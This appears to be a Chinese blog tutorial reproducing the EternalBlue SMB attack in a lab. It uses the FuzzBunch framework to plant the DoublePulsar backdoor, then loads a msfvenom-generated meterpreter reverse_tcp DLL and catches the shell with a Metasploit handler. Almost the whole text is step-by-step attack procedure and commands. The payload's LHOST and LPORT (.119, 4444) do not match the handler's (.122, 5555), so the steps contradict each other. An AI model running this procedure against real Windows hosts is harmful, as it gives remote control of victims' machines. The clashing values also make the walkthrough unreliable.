环境:
- python-2.6.6.msi
https://www.python.org/download/releases/2.6.6/ - pywin32-221.win32-py2.6.exe
https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/
去github上把需要脚本下载下来,解压到桌面上,然后设置python的环境变量,再运行fb.py,再次之前要在当前目录下配置一个名为listeningposts的目录,否则会报错
-
成功执行fb.py的界面为
图片.png
-首先会让你输入目标机器的ip地址;本地ip
图片.png
- 询问是否重定向,选否
-
选择基本日志目录,输入no(由于我这里已经复现过一次,所以这里显示有test)
图片.png
-这里我直接选择0进入test,如果没有test项目,可以选择另一个创建一个新的项目
图片.png- 然后下一步就默认回车
- 使用永恒之蓝的模块
-
下面的默认回车
1.png
2.png -
选择目标机器的系统,选择1
- 选择fuzzbunch
- 然后下面几个默认回车
- 在目标机器对应的SMB端口植入一个名为DoublePulsar的后门程序
- 然后默认回车。。。
- 下面的这个选择 SMB,再下面的选择操作系统版本这里选择64位
-
下一步选择 运行全部 2
图片.png
接下来需要从kali中生成一个.dll的payload,供其使用,将生成出来的dll放到攻击机win7下
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.11.119 LPORT=4444 -f dll > s.dll
图片.png
-
然后把生成的dll文件导入到工具中
图片.png -
然后又是默认敲回车
- 接下来去kali里面配置msf
use exploit/multi/handler
set LHOST 192.168.11.122
set LPORT 5555
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
之后就可以坐等shell上门啦
网友评论